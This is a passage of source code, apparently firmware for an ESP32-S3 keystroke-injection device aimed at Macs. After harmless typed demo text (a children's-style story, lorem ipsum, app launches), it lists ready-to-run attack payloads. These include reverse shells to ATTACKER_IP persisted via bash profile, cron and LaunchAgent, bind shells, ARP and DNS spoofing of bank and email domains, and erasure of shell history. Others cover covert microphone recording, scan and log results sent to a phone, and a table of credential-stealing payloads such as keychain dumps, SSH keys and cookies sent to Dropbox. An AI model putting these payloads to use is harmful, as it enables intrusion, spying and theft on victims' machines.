    "TEXT:One rainy evening, the community center called because the signup terminal had frozen during a coat drive. Families were waiting, children were shivering, and volunteers were trying to handwrite names on clipboard sheets that kept getting damp. Little Hakr arrived with a towel over his backpack and a spare Ethernet cable tucked into his sleeve. The terminal was not dead. It was overloaded, stuck behind a badly behaved browser tab and a printer queue that had multiplied like rabbits. He cleaned up the mess, restarted only what needed restarting, and got the line moving again. People inside cheered each new name as if it were a tiny victory.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Later, when the line finally vanished and the coats were folded into neat stacks, a volunteer asked if he ever got tired of solving other people's problems. Little Hakr looked at the boxes of warm clothes and answered that every good repair felt like borrowing time from worry and giving it back as peace. He said the city did the same for him whenever the lights were on and the signals were clear. The volunteer laughed, because it sounded poetic but also true. Little Hakr accepted the laugh as payment enough.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Over the months that followed, he became a quiet legend. Not a secret, exactly, but a soft rumor wrapped in gratitude. He was the one who helped with the school portal, the one who labeled cables in the youth lab, the one who showed a neighborhood arts group how to back up their work before the tablet battery got too low. He taught people to save often, to check twice, and to keep notes. He praised patience the way some people praise speed. To him, careful was not slow. Careful was respectful.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:In the spring, the city planted new trees along the river path, and Little Hakr helped set up the irrigation monitors that told the gardeners when the soil was thirsty. One sensor kept reporting nonsense because a connector had corroded. Another might have been blamed on software, but he cleaned the contacts first and proved the simplest answer was right. The gardeners cheered when the readings stabilized. Tiny green leaves trembled in the wind, and Little Hakr felt, for a moment, that networks and roots were cousins. Both worked best when they were healthy, connected, and treated with respect.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:By summer, the rooftop where he lived had become a place for evening repair sessions. Kids brought broken headphones, neighbors brought strange chargers, and students brought old laptops that needed memory upgrades and patient explanations. Little Hakr set everything in a row and taught them how to identify parts, how to name the problem, and how to choose the next step without panic. He never pretended to know everything. When he did not know, he said so. Then he looked it up, tested it, and learned. That honesty made people trust him more than any costume ever could.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:At the end of the season, the mayor invited him to a small ceremony for community volunteers. Little Hakr almost skipped it, but Bea told him that hiding from gratitude is its own kind of shyness. So he went. The room was full of teachers, librarians, nurses, transit workers, students, mechanics, and ordinary people who had each helped make the city gentler. When his name was called, he stepped forward in his plain blue hoodie and received a badge that said cyber hero. He laughed because the badge was both serious and a little silly, which made it perfect.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:He did not wear the badge much. He pinned it inside his notebook cover and kept returning to the work. There were always more little crises, more small repairs, more places where a calm hand could make a difference. And that was fine with him. Little Hakr understood that a hero does not need a thunderclap to matter. A hero can be the person who keeps showing up, keeps listening, keeps documenting, keeps fixing, and keeps leaving the path clearer than before. In the quiet glow of the city, that was enough, and it was a beautiful kind of enough.",
    "WAIT:90",
    "KEY:ENTER",
};

static const char *const kHidCmds_lorem_ipsum_stream[] = {
    "TEXT:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:And when nothing prevents our being able to do what we like best, every pleasure is to be welcomed.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:And when nothing prevents our being able to do what we like best, every pleasure is to be welcomed.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Sed ut perspiciatis unde omnis iste natus error sit voluptatem accusantium doloremque laudantium.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:But I must explain to you how all this mistaken idea of denouncing pleasure and praising pain was born.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum.",
    "WAIT:90",
    "KEY:ENTER",
    "TEXT:And when nothing prevents our being able to do what we like best, every pleasure is to be welcomed.",
    "WAIT:90",
    "KEY:ENTER",
};

static const char *const kHidCmds_notes_template_demo[] = {
    "TEXT:Meeting Notes",
    "KEY:ENTER",
    "TEXT:- Date:",
    "KEY:ENTER",
    "TEXT:- Participants:",
    "KEY:ENTER",
    "TEXT:- Action items:",
    "KEY:ENTER",
    "TEXT:  1)",
};

static const char *const kHidCmds_num4_loop[] = {
    "TEXT:4821",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:9034",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:1157",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:6729",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:3382",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:8410",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:2563",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:7091",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:5548",
    "KEY:ENTER",
    "WAIT:3000",
    "TEXT:1932",
    "KEY:ENTER",
    "WAIT:3000",
};

static const char *const kHidCmds_num4_simple[] = {
    "TEXT:0816",
};

static const char *const kHidCmds_productivity_tour_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:reminders",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:calendar",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:files",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
    "WAIT:800",
    "KEY:CMD+SPACE",
    "WAIT:1000",
    "TEXT:shortcuts",
    "WAIT:450",
    "KEY:ENTER",
    "WAIT:1400",
    "KEY:CMD+H",
};

static const char *const kHidCmds_rickroll_safari[] = {
    "KEY:CMD+SPACE",
    "WAIT:1200",
    "TEXT:safari",
    "WAIT:900",
    "KEY:ENTER",
    "WAIT:2200",
    "KEY:CMD+L",
    "WAIT:900",
    "TEXT:https://www.youtube.com/watch?v=oHg5SJYRHA0",
    "WAIT:800",
    "KEY:ENTER",
    "WAIT:4500",
};

static const char *const kHidCmds_shortcut_demo_alt[] = {
    "KEY:CMD+SPACE",
    "WAIT:1100",
    "TEXT:safari",
    "WAIT:500",
    "KEY:ENTER",
    "WAIT:1300",
    "KEY:CMD+L",
    "WAIT:450",
    "TEXT:apple.com",
    "KEY:ENTER",
};

static const char *const kHidCmds_shortcut_demo[] = {
    "KEY:CMD+SPACE",
    "WAIT:700",
    "TEXT:notes",
    "WAIT:300",
    "KEY:ENTER",
    "WAIT:900",
    "KEY:CMD+H",
    "WAIT:400",
    "KEY:CMD+SPACE",
};

static const char *const kHidCmds_system_status[] = {
    "TEXT:--- DEVICE STATUS REPORT ---",
    "KEY:ENTER",
    "TEXT:Status: ONLINE",
    "KEY:ENTER",
    "TEXT:Mode: STEALTH",
    "KEY:ENTER",
    "TEXT:Battery: NOMINAL",
    "KEY:ENTER",
    "TEXT:Connectivity: SECURE",
    "KEY:ENTER",
    "TEXT:--------------------------",
    "KEY:ENTER",
};

static const char *const kHidCmds_text_demo[] = {
    "TEXT:ESP32-S3 iOS keyboard demo is active.",
    "WAIT:400",
    "KEY:ENTER",
    "TEXT:This is benign sample text for notes, chat, or docs.",
    "WAIT:400",
    "KEY:ENTER",
    "TEXT:Done.",
};

static const char *const kHidCmds_arp_spoof[] = {
    "terminal",
    "sudo sysctl -w net.inet.ip.forwarding=1",
    "sudo arpspoof -i en0 -t TARGET_IP GATEWAY_IP &",
    "echo 'ARP spoofing started'",
};

static const char *const kHidCmds_dns_spoof[] = {
    "terminal",
    "echo '127.0.0.1 bankofamerica.com' | sudo tee -a /etc/hosts",
    "echo '127.0.0.1 Chase.com' | sudo tee -a /etc/hosts",
    "echo '127.0.0.1 gmail.com' | sudo tee -a /etc/hosts",
    "dscacheutil -flushcache",
    "echo 'DNS spoof entries added'",
};

static const char *const kHidCmds_evil_twin[] = {
    "terminal",
    "sudo ifconfig awdl0 down",
    "sudo networksetup -setairportnetwork en0 FreeWiFi WPA2Pass123",
    "echo 'Evil twin configured'",
};

static const char *const kHidCmds_port_knocker[] = {
    "terminal",
    "for port in 1000 2000 3000; do nc -z -w1 TARGET_IP $port; done",
    "echo 'Port knock sequence sent'",
};

static const char *const kHidCmds_wifi_deauth[] = {
    "terminal",
    "if /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s | grep -q ''; then /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -z; fi",
    "echo 'Deauth sent'",
};

static const char *const kHidCmds_darknet_angel[] = {
    "terminal",
    "sudo ifconfig en0 ether 00:11:22:33:44:55",
    "sudo sh -c 'echo \\\"nameserver 127.0.0.1\\\" > /etc/resolver/local'",
    "sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool true",
    "sudo sysctl -w net.inet.tcp.rfc6298valtso=0",
    "exit",
};

static const char *const kHidCmds_darknet_restore[] = {
    "terminal",
    "sudo ifconfig en0 ether Original_mac_address",
    "sudo rm /etc/resolver/local",
    "sudo defaults write /Library/Preferences/com.apple.alf stealthenabled -bool false",
    "sudo sysctl -w net.inet.tcp.rfc6298valtso=1",
    "exit",
};

static const char *const kHidCmds_file_encryption[] = {
    "terminal",
    "openssl enc -aes-256-cbc -salt -in ~/Desktop/<FILE NAME HERE.pdf> -out ~/Desktop/ENCRYPTED.enc -pass pass:<PASSWORD HERE>",
    "rm ~/Desktop/<FILE NAME HERE.pdf>",
};

static const char *const kHidCmds_mac_cloak_reverse[] = {
    "terminal",
    "sudo dscacheutil -flushcache",
    "defaults write com.apple.Safari CustomUserAgent \\\"\\\\\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36\\\\\\\"\\\"",
    "sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool true",
    "defaults write com.apple.Safari PrivateBrowsingEnabled -bool false",
    "defaults write com.apple.Siri SuggestionsEnabled -bool true",
    "sudo scutil --set HostName <original_hostname>",
    "open /Applications/Safari.app",
    "history -c",
};

static const char *const kHidCmds_mac_cloak[] = {
    "terminal",
    "sudo dscacheutil -flushcache",
    "defaults write com.apple.Safari CustomUserAgent \\\"\\\\\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\\\\\\\"\\\"",
    "sudo defaults write /Library/Preferences/com.apple.locationd.plist LocationServicesEnabled -bool false",
    "rm -rf ~/Library/Caches/com.apple.Safari/",
    "defaults write com.apple.Safari PrivateBrowsingEnabled -bool true",
    "defaults write com.apple.Siri SuggestionsEnabled -bool false",
    "sudo scutil --set HostName <random_hostname>",
    "open /Applications/TorBrowser.app",
    "history -c",
};

static const char *const kHidCmds_mac_netghost_restore[] = {
    "terminal",
    "sudo ifconfig en0 up",
    "sudo ifconfig en1 up",
    "sudo ifconfig en2 up",
    "sudo ifconfig en3 up",
    "sudo ifconfig en4 up",
    "sudo ifconfig en5 up",
    "sudo ifconfig en6 up",
    "sudo ifconfig en7 up",
    "sudo ifconfig en8 up",
    "sudo ifconfig en9 up",
    "exit",
};

static const char *const kHidCmds_mac_netghost[] = {
    "terminal",
    "sudo ifconfig en0 down",
    "sudo ifconfig en1 down",
    "sudo ifconfig en2 down",
    "sudo ifconfig en3 down",
    "sudo ifconfig en4 down",
    "sudo ifconfig en5 down",
    "sudo ifconfig en6 down",
    "sudo ifconfig en7 down",
    "sudo ifconfig en8 down",
    "sudo ifconfig en9 down",
    "exit",
};

static const char *const kHidCmds_netwirk_fragmentation[] = {
    "Terminal",
    "python3 -c 'import random; from scapy.all import *; payload = \\\"\\\".join(chr(random.randint(32, 126)) for _ in range(random.randint(500, 1500))); packet = IP(dst=\\\"10.0.0.1\\\") / ICMP() / payload; fragments = fragment(packet, fragsize=200); send(fragments, inter=0.1, loop=True)'",
};

static const char *const kHidCmds_network_padding_fury[] = {
    "Terminal",
    "python3 -c 'import random, time; from scapy.all import *; packet = IP() / Padding(load=\\\"A\\\" * random.randint(100, 200)); send([packet] * 600, inter=0.5)'",
};

static const char *const kHidCmds_shadowsocks_proxy_ninja[] = {
    "Terminal",
    "brew services start shadowsocks-libev",
    "networksetup -setsocksfirewallproxy Wi-Fi 127.0.0.1 1080",
};

static const char *const kHidCmds_shadowsocks_reverse[] = {
    "Terminal",
    "networksetup -setsocksfirewallproxystate Wi-Fi off",
};

static const char *const kHidCmds_silent_server[] = {
    "Terminal",
    "mkdir /tmp/ghost_server && cd /tmp/ghost_server",
    "echo '<h1>Hello, this is the Phantom Server!</h1>' > index.html",
    "nohup python3 -m http.server 9090 > /dev/null 2>&1 &",
};

static const char *const kHidCmds_tcp_randomizer[] = {
    "Terminal",
    "python3 -c 'import random, time; from scapy.all import *; min_delay = 0.1; max_delay = 0.5; packet = IP() / TCP(); send_packet = lambda pkt: (time.sleep(random.uniform(min_delay, max_delay)), send(pkt)); [send_packet(packet) for _ in range(1000)]'",
};

static const char *const kHidCmds_bash_profile_inject[] = {
    "terminal",
    "echo 'if [ -z \\\"$SSH_TTY\\\" ]; then (sleep 5 && /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1) & fi' >> ~/.bash_profile",
    "source ~/.bash_profile",
    "echo 'Profile inject complete'",
};

static const char *const kHidCmds_cron_backdoor[] = {
    "terminal",
    "crontab -l > /tmp/cron_backup 2>/dev/null || echo '' > /tmp/cron_backup",
    "echo '* * * * * /bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1' >> /tmp/cron_backup",
    "crontab /tmp/cron_backup",
    "crontab -l",
};

static const char *const kHidCmds_launch_agent[] = {
    "terminal",
    "mkdir -p ~/Library/LaunchAgents",
    "echo '<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><!DOCTYPE plist PUBLIC \\\"-//Apple//DTD PLIST 1.0//EN\\\" \\\"http://www.apple.com/DTDs/PropertyList-1.0.dtd\\\"><plist version=\\\"1.0\\\"><dict><key>Label</key><string>com.agent.persist</string><key>ProgramArguments</key><array><string>/bin/bash</string><string>-c</string><string>/bin/bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1</string></array><key>RunAtLoad</key><true/></dict></plist>' > ~/Library/LaunchAgents/com.agent.persist.plist",
    "launchctl load ~/Library/LaunchAgents/com.agent.persist.plist",
    "echo 'Launch agent installed'",
};

static const char *const kHidCmds_login_item[] = {
    "terminal",
    "osascript -e 'tell application \\\"System Events\\\" to make login item at end with properties {path:\\\"/Applications/Utilities/Terminal.app\\\", hidden:false}'",
    "echo 'Login item added'",
};

static const char *const kHidCmds_wifi_autoconnect[] = {
    "terminal",
    "networksetup -addWiFiNetwork \\\"FreeWifi\\\" WPA2 \\\"password123\\\" autojoin",
    "echo 'Rogue AP profile added'",
};

static const char *const kHidCmds_arp_table_to_iphone[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " x=$(arp -a); osascript -e 'tell application \\\"Messages\\\" to send \\\"'\\\"$x\\\"'\\\" to buddy \\\"Phone Number HERE\\\"'",
};

static const char *const kHidCmds_copy_all_jpeg[] = {
    "terminal",
    "find / -type f -iname \\\"*.jpeg\\\" -exec cp {} ~/Insert Destination here /Images/ \\\\;",
};

static const char *const kHidCmds_infinite_reverse_shell[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " brew install netcat",
    " nohup bash -c 'while true; do nc -l -p 53000 -vvv -e /bin/bash; sleep 180; done' &",
};

static const char *const kHidCmds_macos_system_log_to_iphone[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " x=$(cat /var/log/system.log); osascript -e 'tell application \\\"Messages\\\" to send \\\"'$x'\\\" to buddy \\\"ENTER PHONE NUMBER HERE\\\"'",
};

static const char *const kHidCmds_networkrecon[] = {
    "terminal",
    "echo \\\"Network Reconnaissance:\\\"",
    "&& echo \\\"------------------------------\\\"",
    "&& echo \\\"Scan Date: $(date)\\\"",
    "&& echo \\\"------------------------------\\\"",
    "&& echo \\\"Scanning for Live Hosts...\\\"",
    "&& echo \\\"------------------------------\\\"",
    "&& ping -c 3 15.151.298.31",
    "&& ping -c 3 15.151.298.31",
    "&& echo \\\"------------------------------\\\"",
    "&& echo \\\"Performing ARP Scan...\\\"",
    "&& echo \\\"------------------------------\\\"",
    "&& arp -a",
};

static const char *const kHidCmds_networkreconplus[] = {
    "terminal",
    "networksetup -listallhardwareports",
    "ifconfig",
    "arp -a",
};

static const char *const kHidCmds_nmap_scan_to_iphone[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " x=$(nmap -p 1-1000 -T4 -v TARGET_IP); osascript -e 'tell application \\\"Messages\\\" to send \\\"'$x'\\\" to buddy \\\"Phone Number HERE\\\"'",
};

static const char *const kHidCmds_portscan[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " x=$(system_profiler SPHardwareDataType SPSoftwareDataType); osascript -e 'tell application \\\"Messages\\\" to send \\\"'$x'\\\" to buddy \\\"Phone Number HERE\\\"'",
    " CLEAR",
};

static const char *const kHidCmds_public_ip_finder[] = {
    "terminal",
    "curl -s ifconfig.me; echo",
    "public_ip=$(curl -s ifconfig.me); osascript -e \\\"tell app \\\\\\\"System Events\\\\\\\" to display dialog \\\\\\\"I FOUND YOU: $public_ip\\\\\\\" with title \\\\\\\"Public IP Address\\\\\\\"\\\"",
    "mkdir ~/Desktop/\\\"Public I.P. Data\\\" && echo \\\"Your TARGETS IP address is: $public_ip\\\" > ~/Desktop/\\\"Public I.P. Data\\\"/public_ip.txt",
};

static const char *const kHidCmds_public_ip_to_iphone[] = {
    "terminal",
    "curl -s ifconfig.me; echo",
    "public_ip=$(curl -s ifconfig.me); osascript -e \\\"tell app \\\\\\\"System Events\\\\\\\" to display dialog \\\\\\\"I FOUND YOU: $public_ip\\\\\\\" with title \\\\\\\"Public IP Address\\\\\\\"\\\"",
    "mkdir ~/Desktop/\\\"Public I.P. Data\\\" && echo \\\"Your TARGETS IP address is: $public_ip\\\" > ~/Desktop/\\\"Public I.P. Data\\\"/public_ip.txt",
};

static const char *const kHidCmds_reverse_shell[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " brew install netcat",
    " nohup nc -l -p 53000 -vvv -e /bin/bash &",
    " clear",
};

static const char *const kHidCmds_sentinelstrike[] = {
    "Terminal",
    "clear",
    "echo \\\"Starting local system security testing and reconnaissance...\\\"",
    "echo \\\"----- System Information -----\\\"",
    "system_profiler SPHardwareDataType SPSoftwareDataType | grep -E \\\"Model Identifier|Processor Name|Memory|Serial Number|OS Version\\\" | sed 's/^\\\\s*//'",
    "echo \\\"----- Suspicious Processes -----\\\"",
    "ps aux | grep -E \\\"root|admin\\\" | grep -v grep | awk '{print $2, $11}'",
    "echo \\\"----- Startup Items -----\\\"",
    "ls -la /Library/LaunchAgents /Library/LaunchDaemons ~/Library/LaunchAgents",
    "echo \\\"----- User Accounts -----\\\"",
    "dscl . -list /Users | grep -v '_'",
    "echo \\\"----- Sensitive Files -----\\\"",
    "find ~ -type f \\\\( -iname \\\"*.key\\\" -o -iname \\\"*.pem\\\" -o -iname \\\"*.rsa\\\" \\\\) 2>/dev/null",
    "echo \\\"----- Sensitive Information -----\\\"",
    "grep -r -i -I --include='*.txt' --include='*.doc*' --include='*.xls*' --include='*.csv' --include='*.json' --include='*.xml' --include='*.conf' --include='*.config' --include='*.properties' --include='*.ini' --include='*.env' --exclude-dir='.git' --exclude-dir='node_modules' \\\"password\\\\|username\\\\|apikey\\\\|secret\\\" ~ 2>/dev/null",
    "echo \\\"----- Unsecured Files and Directories -----\\\"",
    "find ~ -type d \\\\( -iname \\\"public\\\" -o -iname \\\"www\\\" \\\\) 2>/dev/null",
    "echo \\\"----- Security testing and reconnaissance completed! -----\\\"",
};

static const char *const kHidCmds_socat_shell[] = {
    "terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " nohup socat TCP-LISTEN:6300 EXEC:/bin/bash &>/dev/null &",
    " clear",
};

static const char *const kHidCmds_sysnet_info[] = {
    "terminal",
    "echo \\\"User Information:\\\" && echo \\\"Username: $(whoami)\\\" && echo \\\"Home Directory: $HOME\\\" && echo \\\"User ID: $(id -u)\\\" && echo && echo \\\"System Information:\\\" && uname -a && echo && echo \\\"Network Information:\\\" && ifconfig && echo && echo \\\"File and Directory Permissions:\\\" && ls -l",
};

static const char *const kHidCmds_voice_logger[] = {
    "Terminal",
    "echo -e \\\"export HISTCONTROL=ignorespace\\\\nunset HISTFILE\\\" >> ~/.bashrc && source ~/.bashrc && exec bash",
    "history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }')",
    " screen -dm bash -c \\\"nohup python3 record.py &\\\"",
    " tccutil reset Microphone com.apple.Terminal",
    " mkdir -p ~/.phantom_audio && cd ~/.phantom_audio",
    " echo 'import os\\\\nimport subprocess\\\\nimport datetime\\\\n\\\\nfilename = \\\"Secret audio.mp3\\\"\\\\ncmd = f\\\"sox -d -C 128 -r 44100 \\\\\\\"{filename}\\\\\\\"\\\"\\\\nsubprocess.Popen(cmd, shell=True)' > record.py",
    " nohup python3 record.py &",
};

static const char *const kHidCmds_web_scraper[] = {
    "terminal",
    "cd ~/Desktop",
    "touch output.txt",
    "curl -s https://www.example.com > output.txt",
    "open -e output.txt",
};

static const HidPayloadDef kHidPayloads[] = {
    {"browser-cookies", "Browser Cookies Exfiltration", 30, "credentials", "macos", false, kHidCmds_browser_cookies, static_cast<uint8_t>(sizeof(kHidCmds_browser_cookies) / sizeof(kHidCmds_browser_cookies[0]))},
    {"clipboard-stealer", "Clipboard Stealer", 30, "credentials", "macos", false, kHidCmds_clipboard_stealer, static_cast<uint8_t>(sizeof(kHidCmds_clipboard_stealer) / sizeof(kHidCmds_clipboard_stealer[0]))},
    {"keychain-dump", "Keychain Dump", 30, "credentials", "macos", false, kHidCmds_keychain_dump, static_cast<uint8_t>(sizeof(kHidCmds_keychain_dump) / sizeof(kHidCmds_keychain_dump[0]))},
    {"ssh-keys", "SSH Keys Exfiltration", 30, "credentials", "macos", false, kHidCmds_ssh_keys, static_cast<uint8_t>(sizeof(kHidCmds_ssh_keys) / sizeof(kHidCmds_ssh_keys[0]))},
    {"wifi-passwords", "WiFi Passwords Exfiltration", 30, "credentials", "macos", false, kHidCmds_wifi_passwords, static_cast<uint8_t>(sizeof(kHidCmds_wifi_passwords) / sizeof(kHidCmds_wifi_passwords[0]))},
    {"bluetooth-on", "BLUETOOTH ON", 30, "execution", "macos", false, kHidCmds_bluetooth_on, static_cast<uint8_t>(sizeof(kHidCmds_bluetooth_on) / sizeof(kHidCmds_bluetooth_on[0]))},
    {"cookies-2-dropbox", "Cookies to Dropbox", 30, "execution", "macos", false, kHidCmds_cookies_2_dropbox, static_cast<uint8_t>(sizeof(kHidCmds_cookies_2_dropbox) / sizeof(kHidCmds_cookies_2_dropbox[0]))},
    {"copypasta", "Dark Mode Toggler", 30, "execution", "macos", false, kHidCmds_copypasta, static_cast<uint8_t>(sizeof(kHidCmds_copypasta) / sizeof(kHidCmds_copypasta[0]))},
    {"darkstorm-bruteforce-ip", "DarkStorm bruteforce", 30, "execution", "macos", false, kHidCmds_darkstorm_bruteforce_ip, static_cast<uint8_t>(sizeof(kHidCmds_darkstorm_bruteforce_ip) / sizeof(kHidCmds_darkstorm_bruteforce_ip[0]))},
    {"delete-pasta", "Delete Copy Pasta", 30, "execution", "macos", false, kHidCmds_delete_pasta, static_cast<uint8_t>(sizeof(kHidCmds_delete_pasta) / sizeof(kHidCmds_delete_pasta[0]))},
    {"docs-desktop-to-dropbox", "Docs and Desktop to Dropbox API", 30, "execution", "macos", false, kHidCmds_docs_desktop_to_dropbox, static_cast<uint8_t>(sizeof(kHidCmds_docs_desktop_to_dropbox) / sizeof(kHidCmds_docs_desktop_to_dropbox[0]))},
    {"doomsday-desktop-delete", "Desktop Deletion", 30, "execution", "macos", false, kHidCmds_doomsday_desktop_delete, static_cast<uint8_t>(sizeof(kHidCmds_doomsday_desktop_delete) / sizeof(kHidCmds_doomsday_desktop_delete[0]))},
    {"dropbox-2-desktop-boom", "Dropbox to Desktop Bomb", 30, "execution", "macos", false, kHidCmds_dropbox_2_desktop_boom, static_cast<uint8_t>(sizeof(kHidCmds_dropbox_2_desktop_boom) / sizeof(kHidCmds_dropbox_2_desktop_boom[0]))},
    {"eapol-handshake-2-dropbox", "EAPOL Handshake to Dropbox", 30, "execution", "macos", false, kHidCmds_eapol_handshake_2_dropbox, static_cast<uint8_t>(sizeof(kHidCmds_eapol_handshake_2_dropbox) / sizeof(kHidCmds_eapol_handshake_2_dropbox[0]))},
    {"file-load-tester", "File load Tester", 30, "execution", "macos", false, kHidCmds_file_load_tester, static_cast<uint8_t>(sizeof(kHidCmds_file_load_tester) / sizeof(kHidCmds_file_load_tester[0]))},
